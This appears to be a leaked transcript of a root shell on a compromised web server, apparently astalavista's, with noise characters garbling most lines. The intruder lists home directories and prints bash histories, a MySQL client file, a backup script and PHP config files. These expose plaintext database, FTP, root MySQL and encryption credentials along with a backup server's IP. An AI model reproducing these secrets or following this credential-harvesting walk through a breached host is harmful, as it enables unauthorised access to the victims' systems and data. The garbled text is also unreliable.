sh-3.2# cat /etc/motd
/ h+ ]5 ^0 e" R( m#####################################################4 w2 ]. T) t* a: k3 f7 C# E, o6 y% `
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #6 l; N+ O) d& o* ~# h( a! x Z
# |__| [__ | |__| | |__| | | | [__ | |__| #
# r& o X- G, r5 D; ]# F# | | ___] | | | |___ | | \/ | ___] | | | #/ f% \2 `* a. C+ J; [! \+ j
# #
8 x6 {) D* J5 W3 j8 D+ g1 @8 R8 d#####################################################
( y( K ]0 h$ m% L# #. H5 O1 w" t* L- O
# Admin Contact - 链接标记support@secureservertech.com #
3 U, M1 C& T( A* v# #
8 I- q" F6 e- n6 q+ ]3 z# Available ShortCuts #
3 f2 x) |0 j; b: F; p: w' |# #5 h+ g3 f% g! ]) Y( j( m
# nst - list active connections #! m( v9 z( D0 c2 r' L: ?+ {
# ddos - shows how many times each ip is connected #
9 `0 v6 N4 G+ h2 [ ]3 Y# ltr - restart the webserver #
& Z+ \- u3 h* R" n# phpc - edit the php config file ## I0 R" ?$ e5 F+ Y7 k
# htc - edit the webserver configuration file #
1 e- R. x4 ~3 B, q5 U; q# up - uptime #) L5 X! _. ^( v6 M# H8 w! E7 H
# etd - edit the motd of the day file #
0 G) g; h( ^+ I- @3 V* T# htr - start and restart apache if needed #- ? f* m4 g" ?3 p0 ]; F
# syng - shows active SYN_RECV connections #& d! m7 F- ^( w; o" y: S! M
# synd - syn flood blocker - “synd -h” for usage #$ p2 C0 B: y4 ^: p8 F1 f& V" i
#####################################################9 e; X+ T- U$ b- G6 }7 H
# NOTES: #% c* s- U3 f8 U2 ]: f
# Last Upgrade - 12-08-2008 by JF #5 L& T2 `% v5 ?' P' j, Y$ [& s
# My.cnf/Mysql Optimization - 1-28-09 #
) n4 A: w: O$ m+ p* H# #
7 b; t6 I7 j0 d! V2 ?4 H9 w- A5 A# #
9 n% T. l& p# l- y3 A! X E# #
" f4 r5 @7 w9 y W8 W' r#####################################################
& N% |2 Y+ `$ S+ A
( J0 ]6 W$ \0 \7 |, ^4 E! ?sh-3.2# lastlog | grep -v Never- z4 ~0 ?# u1 [0 s$ F: f# M6 G0 n
Username Port From Latest
7 w) e \: w' }& X- W) x( lroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009+ `& | F+ P4 c1 e7 o: N: {
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20083 [ L" `3 ]! k! `: g5 Z3 N
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
% p$ \ i, q I8 r3 o5 j1 iastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
, y, X5 r2 ^3 T0 m, \) A& U/ M A1 w* b2 X# ^( I' g
sh-3.2# ls -la
6 d) z6 E; h( `% s9 X7 B, B Stotal 453376
- k9 f' [ ^! P% V* O* D! P! y6 D% f& cdrwxr-x— 15 root root 4096 Jun 4 08:40 .
! C \& ]2 e- n$ n8 I B- cdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 T' v, T# L ^4 A3 T& n-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
$ G. [5 y+ \+ \, i* R9 L1 b-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
G" C( C3 A$ r-rw——- 1 root root 16836 Jun 4 07:21 .bash_history8 `" U8 J0 o @, e
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
! q7 B! q) F; v; `- C. ]' Q4 ^; X-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
2 a6 ]/ {+ N) f3 N2 M& e4 |9 Q* D-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
* W: {2 c7 v; `0 m$ p; H. o$ ^-rwx—— 1 root root 1899 Oct 28 2007 bk.sh( `4 E9 n: T' i, _
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
! R* m; p7 U) ]! i$ X-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
1 s0 ^4 n6 |; i$ Qdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan6 q' Z+ Y* t% X! w9 U- _) b$ r
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
0 n# ]' `4 V' _5 x-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql0 G2 w/ c7 x9 R$ B5 k/ b
drwx—— 2 root root 4096 Oct 28 2007 .elinks+ S- b6 B& C& a# v6 Z$ S
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1, ~( _% d3 O5 |8 i8 s
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2" m' H: g: V9 T: D6 N/ v
-rw——- 1 root root 0 Apr 16 13:19 .history
2 f' J. q# P' M/ \4 [' d-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
3 `' ~$ f* J8 w5 Z! j' N0 ?-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog3 n9 ~, r5 W) ~* A: o
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh, }: _( o$ } \2 B0 J
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
a$ {" l7 i* e5 k/ E1 Edrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
$ W" t O6 t. \8 L9 g7 ?5 b6 y, Gdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
$ X. L5 x% v8 v1 O% n-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
# k" `" P! B, Q& ]-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
Q& G/ y; e. n-rwx—— 1 root root 760 Sep 18 2008 lp
! C3 j m3 r7 D7 h# a6 fdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1; g; Q {" x; ~* w$ O: p
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
0 ^& N. [% Q3 g-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
% R- m D- c$ O" a# ^: A0 s2 gdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.99 \* Q' A e1 B) I, a+ m4 I( j
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
/ |% f6 c' v! N+ a) |drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3. _3 A! y' c7 c: K2 s
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz4 T- i6 u" }% Z- }$ @8 A6 n5 @
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
, z3 ?$ q: F4 Z3 f* y-rw——- 1 root root 41 Oct 19 2007 .my.cnf
2 }4 ?, ^ _5 x9 F6 N' O4 m-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history! `: ]- R" }+ D# y, R! [* K# J
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport0 z0 W: D# ~2 L! K, v
-rw——- 1 root root 41 May 20 2008 .mytop! o: a8 F8 N3 r9 y6 u: V S
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
: z2 u6 i+ O) {( ^% J-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
! G" A2 e, a# j5 P* n y9 `% M0 P4 ~drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp; I G$ Y. Y% t- O6 p( ?" E
-rw——- 1 root root 1462 Sep 21 2007 opt.php
' e% ]$ d3 v4 d- M' K8 V-rw-r–r– 1 root root 3371 Sep 22 2007 p* Q( \7 r4 P1 C
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
8 h' f/ C' D+ J' N, R-rw——- 1 root root 1024 Feb 3 21:32 .rnd
5 O2 @5 d" C! o; c-rw-r–r– 1 root root 716 Nov 28 2007 server.csr! o0 ~- m1 e7 y# @& e3 m# a
-rw-r–r– 1 root root 887 Nov 28 2007 server.key: H1 T2 }3 C& k+ Y" ~# H
drwx—— 2 root root 4096 Oct 10 2008 .ssh
# r R2 |* h3 c) x, N! ^& l1 f& _/ y-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
. K# P) K" N4 n+ h- }-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
+ t8 N7 w4 r2 J. H) p-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
& }- n. }" z7 K" b1 E-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
; ^* w3 `; p( y# vdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp, e" c* F3 B0 k
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh3 V! M( F2 v# O+ G# {1 z2 b# s
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.09 }- y( \8 X' S2 }: x1 I
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
3 K, y: M+ h; s$ |-rw——- 1 root root 12997 May 16 2008 .viminfo
" |, B/ ?+ D& `2 Q) l+ E" j4 d" D/ h# y3 M/ z7 Y
sh-3.2# cat .bash_history
' d+ D; V1 E2 c# `[snip]
7 ~3 ^1 F* X6 v& F- x1 |wget cp4sst.com/sstlinux.tar.gz* Z$ k( G! [/ r
tar zxvf sstlinux.tar.gz# l2 E$ ?7 s2 n7 L0 R3 z0 O# i
cd linux-2.6.27.10
* y. ?, ~3 C7 G7 ]1 F! Vsh install.sh! _% g; v+ O ?# n4 N6 U
make bzImage ; make modules ; make modules_install ; make install! Y- h- @1 c: W5 q
make clean
. K! w0 G$ F) b( Z9 Cservice mysqld restart8 Q+ | A/ G0 p- z
[snip]+ {0 x& `2 q3 S2 ` j$ o. \2 S
cd /usr/sbin/8 d/ h( l1 P; ?5 `8 y
chmod 4777 traceroute
1 f# }. O9 t$ y3 I9 f- dchmod 4777 ping# c6 r+ q+ g( }0 Z, T* l
traceroute -I 链接标记[url]www.astalavista.ch[/url]
, E) D+ C6 }! b. i5 ][snip]+ D# T5 }& h& d/ S$ y3 q2 o3 X; b
vi /etc/csf/csf.conf
6 R5 m4 k$ i% X2 q! N, mtraceroute google.ch
9 D9 N) x% I x' G- m0 Z' e: {service csf restart
: `( t s$ P/ ztracert google.ch) u( l9 J9 ^8 d; a3 G# Y
service csf restart* B! {8 {# F) R* i0 g
traceroute 链接标记[url]www.google.ch[/url]
6 f/ ~9 Z1 v* l ?5 A, Ntracert 链接标记[url]www.google.ch[/url]
; @# }/ b4 c) n7 b% `! |# W" atraceroute 链接标记[url]www.google.ch[/url]
. `; l1 {+ O2 J8 B* J7 f7 tlocate traceroute! G! [1 c: F1 i( j5 Y4 z3 c
chown 4755 /bin/traceroute1 K/ q7 O4 ^) e: k7 Z$ g2 L
chown 4777 /bin/traceroute
0 ^9 N p4 `0 K, j0 n) Y7 M& d# r9 nlocate ping. f' ^# r& e( E0 Q
chown 4755 /bin/ping) ~) r+ ~( g6 s/ ~' W, l
chown 4777 /bin/ping/ Y& q# E5 a3 i. r! ~
cd /bin/
- N" m$ e, i1 V# C, V% p1 Dls -ali | grep ping
3 e0 t" U: x9 H) |" N9 Dchown root ping) a4 H g% E( i% T$ @4 ]) n3 G) L+ t2 j- ~) p
chmod 4755 ping
4 A# U7 e( K# ?) U) G/ d( ]; d* jls -ali | grep traceroute1 B* I& W ]) ^
chown root traceroute
. P$ [7 x/ Q) Fchmod 4755 traceroute; P/ z/ B1 j3 j7 g7 G$ L
ls -ali | grep traceroute K3 \2 n+ @, ?; T
traceroute -I 链接标记[url]www.google.ch[/url]$ w2 R g' W) v. w9 u
traceroute 链接标记[url]www.google.ch[/url]
- X) n7 F6 r+ S% d1 v Fwhois pmsantos.ch
* S* Y1 Y3 ^1 w2 k$ C* `6 m0 b[snip]$ M# t/ D' g, d7 |
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
2 t! }0 L$ ]1 b: L2 O& c* p% Jmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
& F3 ?" l) b$ K' Y/ {mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql: Y- \7 i: t" H- ~! U" O3 _- f
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql: `! W( {* ^8 }" q$ g
top
$ E% [+ }4 [# r4 y. T3 W9 |ping ssth.ch
0 C0 x# Q3 [, Tping asdlkfaljgasd???ljg???lasj.ch0 Q) K: f, G$ b) e& D. [8 _* r3 F
ping asdlkfaljgasdlasj.ch
0 Z c5 i6 R6 b. R9 m8 d. n$ rping 链接标记[url]www.ssth.ch[/url]
( E1 }/ f) i1 X ]) h p. _4 Oping ssth.ch
+ A1 t4 ?: h1 b4 b5 {7 _+ I p! c2 Znslookup 链接标记[url]www.google.ch[/url]& V3 a$ T" Z4 _3 {
nslookup 链接标记[url]www.ssth.ch[/url], x- U6 O; T% u
man nslookup) f" m: q. c" U: x5 L
ping 链接标记[url]www.google.ch[/url]2 p2 [ }& M& T1 A1 K8 F- t
nslookup 链接标记[url]www.google.ch[/url]! F6 r* ?: `4 K, D7 O3 u
nslookup 链接标记[url]www.google.ch[/url]& v2 _1 i+ z" a5 x: Q& u
nslookup salfjasdlf.ch
: o" [. R1 A" b: |/ R, l[snip]! H: [9 t; n+ n: e2 e( N
openssl passwd -1 sadf
5 k7 l7 D9 `1 z# \1 dopenssl passwd -1 5cZNHstdTy( K1 P7 x- X$ k$ `
mysql5 B+ u, [. _, ?: @: {! N% f1 D
mysql! F2 D" j& O! Y% R
locate proftp% B3 h/ M5 |9 x6 x& | C
vi /etc/proftpd.passwd
& ~: ?1 ~$ D) c6 C( @service proftpd restart
) E# h$ X+ i* x: m# ~, k& Ylocate proftpd.conf/ i* [2 W; W+ p3 V. ]# m, M" V" p
vi /etc/proftpd.conf
5 ~& g+ ]* e; A0 z( f" J, t) H1 Uvi /etc/proftpd.passwd' p1 O, }7 O, G: b
service proftpd restart4 `0 t a1 W3 m T2 p1 N) q
[snip]! k# L1 e9 }: C1 b% v
/bin/sh /home/com/backup_system/backup.sh- p U: [5 k R) J+ @
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin# I4 J$ H) }3 c4 a( g% N
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
9 e; J: i1 l' R9 X3 I. ]0 Lmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
. ^ t% J0 t: v9 x- u9 l# Fls -ali
0 g7 b# H e! p% H( i% Fmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql, R( i8 H) x, C
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
' ]) V0 G Z. J$ U. J" Ccrontab -l
& ]& J L9 M5 U8 M# |crontab -l
: y8 Y& L: T& r3 w4 wphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
1 Y6 D% u% X# z6 ^+ D8 d! X/home/com/public_html/modifications/cronjobs/exploits.sh
: D& d2 `4 |+ I( A/ v) Twget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
h4 g) N" p- atar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz' g4 _: I5 G# ]. X! V
cd lsws-4.0.3
3 j; L5 p6 }: u1 V: A) G6 o. \sh install.sh
' K5 k0 A/ L. q, Q8 k/ L- {uptime* @" V8 n- P% K3 R+ n+ f
hdparm -tt /dev/sda7 \" a( u" l! e; v. m; ^
iostat# K g$ O" T$ X" d" E
yum install iostat- d) {% W" R' h9 _) m6 Z
iostat
# ^4 y7 h, u2 d* M' U, w R% T+ ^whereis iostat
; R3 j2 F- K" g& Q! x8 |. z+ r. T1 Kyjm clean all {$ O7 w9 W+ y
yum clean all ; yum -y update
( G, ]; m; D# @, e4 W5 Riostat% t& c" V. C3 O5 p
yum install systat
! Z* t- t" r/ N6 c/ E8 C) [2 z" w0 Trpm -qa | grep iostat
9 o0 u9 l7 |! L2 B( Trpm -qa | grep sysstat
$ r( B( v' ~' R, \4 H }rpm -qa | grep systat9 u" q& s# [8 F
dmesg -c9 {0 q- V0 k3 H# D" ^- [
sysctl -p+ Z( e9 f- Z. A
uname -r
" p J0 h K9 r- h. v: Gcd /usr/src1 d: ]- Q( v/ Q
wget nix101.com/kernels/sstlinux.tar.gz
) m1 o5 r# ^4 ~2 e: Ishutdown -r now2 |! M) [1 o; c Q& F" m
nano -w /boot/grub/grub.conf
0 O$ c" T$ C7 y! @0 o0 Q% X! X
4 [' a( l b7 B1 N$ Nsh-3.2# cat .my.cnf* v, _3 z' {0 N; e
[client]
" j3 l+ A* W- z8 T/ `user=da_admin. {) T& R/ K" b% _: j
password=X9dctmRH$ z0 {# o2 n5 J9 p7 n
5 Y8 B3 n2 F- Xsh-3.2# cat /home/com/backup_system/backup.sh+ v- Q6 ^& A$ W3 h$ V: \
#!/bin/sh3 v7 \+ z0 I% g* E
#####################################################################
5 S2 V& i+ G d! o# #$ f6 H& R6 `: z: ~3 G
# incremental backup for astalavista.com #$ U' g* M' o4 p1 k& X( l
# #- Z$ [9 ^1 M; a( Z `
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #8 X9 i+ t, |: t+ J
# #
# r4 d: V& n$ q3 Q5 r; @6 u$ u##################################################################### X* M+ f7 N" {" F3 M) x. J
[snip]. U, T7 t0 s# ~3 I6 ^ m+ R
PROG_DIR=”/home/com/backup_system”;
( f' q3 w. m, z4 k }6 GBACKUP_DIR=”/home/com/backups”;
/ r% Y, I+ F' u! o6 zDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
* |4 a8 Q) N* F1 N" ]5 W# ftp for synology backup server
6 l, s y* v& U* @/ J: oFTP_HOST=”212.254.194.163″;5 V/ w# O0 ?2 s7 A8 V; r. }+ j
FTP_PORT=”21″;. H* \; h& l* C& I
FTP_USER=”astalavista.com”;! T1 X6 j9 |3 E" }
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;" E, e) C6 J1 Z
FTP_DIR=”/astalavista.com”;
, ]8 X$ ? t( m, {0 p4 h6 Z6 ~# database. G* v! z: g7 a) Y/ g% m
DB_HOST=”localhost”;
$ y" n$ q7 [0 J0 I& W% f/ `$ dDB_USER=”contrexxuser2″;7 [: B: |0 A. P z4 f' W z
DB_PASS=”0fEYNZgXz1pKe”;7 K' p a4 n% W7 r& `/ Y
DB_DATABASE1=”com_contrexx2_live”;1 }! e! A2 I) ` H
DB_DATABASE2=”com_contrexx2″;
: f0 ]$ g) [6 `; K; C- ^[snip]. L- B' r7 l: S$ C& b
ftp -in $FTP_HOST $FTP_PORT <<EOF8 d t( \2 }' H" n) U1 B
quote USER $FTP_USER1 C9 [& ]) W/ R( K. T$ T, Z) w# I
quote PASS $FTP_PASS/ W& e) X. n) L3 H- s
cd $FTP_DIR) W' p, s1 R* n
put $DB_FULLNAME-SQL_Dump.tar* F2 _6 ^4 g2 Q' L6 D g1 L0 I9 k! ?
put $BACKUP_FULLNAME-Public_HTML.tar9 u# l9 e+ Y3 _/ a0 o
close
! T& o' c9 I, S9 r' {$ s( Y |bye% F( J, D W& c. C9 ^% s
EOF
8 [# y& _# [4 {6 O# J* S7 }1 C% m- f; ], R2 I
sh-3.2# cd /home4 E* [- J* g6 B1 s4 a' y! Y# N4 i
sh-3.2# ls -la& L5 q; G6 q( q" n
total 120
]" s9 F2 E9 ^& L) [% idrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
4 q% T( p) A3 Q1 |7 sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* S, ?7 {% l9 x3 G- G# _' T4 w9 W7 w9 b1 H
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
- c7 r2 x/ V+ M1 M-rw——- 1 root root 8192 Jun 4 03:03 aquota.group% J$ y. {# {/ d0 g9 `
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user# M% U/ q) q4 E7 Y9 q: W- V; c' U) O
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
! U+ ?$ s( Q! E: Z/ @drwxr-xr-x 2 root root 4096 Jul 29 2008 backup. M* K6 k* m. B6 ]
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
0 r+ C' ?) | a6 R9 B, I" Fdrwx–x–x 10 com com 4096 Apr 28 12:40 com
+ D' T" R) v2 r) d" S7 }* {$ Jdrwxr-xr-x 2 root root 4096 May 17 2007 ftp/ R; U; q6 y- M2 k
drwx—— 3 jon jon 4096 Sep 21 2007 jon
3 p& |/ }" E0 l2 odrwx—— 2 root root 16384 Sep 11 2007 lost+found# Q- D3 a$ C9 P( d4 s
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 ~8 W( o1 I- {% d& @# Bdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
1 m; n) T' `+ n+ Ndrwx—— 2 jon jon 4096 Sep 15 2007 test
1 k7 D3 f8 p& r* T3 D1 Q' [5 O: kdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp) g% j! `. a' ?2 I7 a1 {
, K q- }$ |% G: x/ k1 ^+ ish-3.2# cd admin
6 r3 t& e2 y) Vsh-3.2# ls -la
3 J# O1 v0 f( R8 P: p9 B3 Dtotal 1735896$ K# ]- K" @# H: `! i
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
) X, I$ G6 e% ~$ h2 d* k: |/ u7 F( r1 adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..& \, O) [# q `' D. c* U
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups$ g, E( H9 H8 g8 z
drwx—— 2 admin admin 4096 Sep 28 2007 backups
0 E }, d( j2 E- b) y( M-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
0 e, _6 C% O+ y# |-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
, [. ~* u2 @+ s$ w& k7 _% D, Y* V-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile7 g( t- x1 O) L
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc' @# y" _! A# A4 b m4 K; p
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
; [9 A* M0 q0 ?2 vdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains* f @: @( M* G0 Q+ p& }/ J A
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
3 P! j1 `0 q5 e2 y. h-rw-r–r– 1 root root 24 Sep 21 2007 info.php9 g& i6 f8 x6 @9 A3 z. J I) M& J
drwx—— 2 admin admin 4096 Sep 21 2007 mail7 k% f1 R [9 _) ^$ e
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
/ H( W/ A8 Y) e% }8 l: ?* G' B; [-rw-r–r– 1 root root 887 Nov 28 2007 server.key9 }+ k; f+ _ M# h! b0 ]
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
1 I y/ |" d9 ?$ { N+ i-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz" M/ u" h+ b3 s: \9 b
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups! B$ i4 n; i5 X
( |. L7 V8 y$ [$ J% o& Dsh-3.2# ..2 O- B4 N/ |+ R) c* W
sh-3.2# cd jon
( Z1 [; y# n0 [' E% M- f- u: D. msh-3.2# ls -la
, z* |. s5 V: y3 Utotal 365 L4 K3 [3 h# {# C& \7 t- D
drwx—— 3 jon jon 4096 Sep 21 2007 .
! ]& g: u. s9 r1 zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 C& p) O4 |! e# t% d3 @
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history: \5 `" v0 I( @& _
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout4 m% Z0 g4 k3 m: p
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile8 S+ l) T m: i6 Q' t7 G
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
6 F7 t& ~1 f: i& f-rw-r–r– 1 root root 24 Sep 21 2007 info.php+ S& c/ M) t8 Z3 j% v0 N+ A
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html& ]7 {! t. p& L3 M: [
7 ]) R/ k: x0 D5 h7 R# Ish-3.2# cd ..
( w: {; V7 \3 \, [/ t1 csh-3.2# cd test5 K9 S7 p' H' } _& i
sh-3.2# ls -la; M/ {6 U9 G- R* f. l2 S/ h; ?
total 488 l2 `+ e6 R4 x, q
drwx—— 2 jon jon 4096 Sep 15 2007 .
/ @, g( S8 S/ L2 q. Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 w; B, e9 j, {
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history& W- c4 @2 o) D. U2 _; R
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
3 z) Y( t6 E! {5 \9 A: m8 V-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile" v3 Y( X4 F9 Q
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc9 K+ Q7 P1 x% A
sh-3.2# cat .bash_history+ ~, z- V. @4 q5 q; n$ i7 Z, I
/usr/bin/mysqladmin -u root password PoliuJhytg67
/ I( P8 U4 ?( d& l' r& _& _) I+ ]' m+ s; J8 Q3 r% j; i' d
sh-3.2# cd ... }' h5 {0 m s- h
sh-3.2# cd astanet
# e8 a# i5 t5 |9 t9 J8 r5 gsh-3.2# ls -la' L# b1 i1 k& E3 ^
total 52
: Y1 B$ S8 D g6 c% K5 m6 T7 L+ `0 P( o. [drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .2 {. P/ x3 p) d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
2 C# J1 w$ H4 ?. g7 Ndrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
7 P# V' |/ m0 [1 u/ I+ Y0 d-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history" x* e5 z' }7 x6 p/ |% x7 T$ k' A. w
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
6 N" i& U9 C8 E3 S# Q-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile1 ^; r9 t$ m! M" i3 |& N$ `
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
6 z9 @) f& N: m% _0 a0 \drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
9 j4 w- d7 f" P: \9 @drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap9 P1 _6 L7 ?& B5 }
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail' A8 R" e" u. D+ U4 W
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
* k M9 i$ X) {& B2 y8 j7 `lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
" P. l- H5 [5 l; y1 v' ?-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow5 S* J& D9 b3 B
8 P1 P4 u6 C$ C- n7 W5 S5 L- b
sh-3.2# cd auth/
" s. m9 P5 E P; @" N8 xsh-3.2# ls -la
# v0 b5 H" S0 o2 I8 c/ Gtotal 28' G5 C% |& z- k; Y, H! ]3 w7 o
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .& g/ u9 i U7 v5 |
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .." N6 { y# g& [+ a6 V' s: @
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
. U3 Z( h {' Z-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
5 z; L& U a6 M-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
" ?) w1 _* a' ^, S# C* Q5 g5 m5 _-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting( O! [) ?1 l( H9 Z
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
! _2 g/ @3 Y' `. K' N# T) h$ [$ n5 W2 k# [, |5 T0 M
sh-3.2# cat hackercontest.config.inc.php
* ~ u# d) J- J& |<?PHP8 K# i% I( t& u5 z# H
// Variabeln f?r Verbindung zur Datenbank //. w p+ `2 T- n6 S- b! ~+ @& u
$conxHost = ‘localhost’; // MySQL hostname
2 m% i; b( x7 o+ M$ s$conxUser = ‘hackercontest’; // MySQL user; ?+ T4 T( A1 l
$conxPassword = ‘K6m@7dUc’; // MySQL password
) l- y: `' Q$ u$ ^9 E$ L& i8 i+ M/ ?$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
6 V: e8 B& P4 v. J?>
" m# `6 A4 U$ c' ]7 m2 hsh-3.2# cat hosting.config.inc.php4 B1 Q- E% L* a+ O9 O
<?PHP6 P7 H- q* F" G" {8 ~8 A
// Variabeln f?r Verbindung zur Datenbank //7 c0 r% T# P/ t9 C
$conxHost = ‘localhost’; // MySQL hostname
( g8 \& X7 T: y2 k$conxUser = ‘hostinguser’; // MySQL user& k- F! u$ f$ P6 ]' j0 i
$conxPassword = ‘cXvB3981′; // MySQL password5 t1 P" @* f- J f! H
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
0 O5 m3 Q( O6 R0 a$ T! O. s?>
. Y% p5 _! |; X4 t
9 s5 \3 f3 k& \9 W$ A8 }; tsh-3.2# cd ..
! M) T. p0 o' g: Z* hsh-3.2# cd com
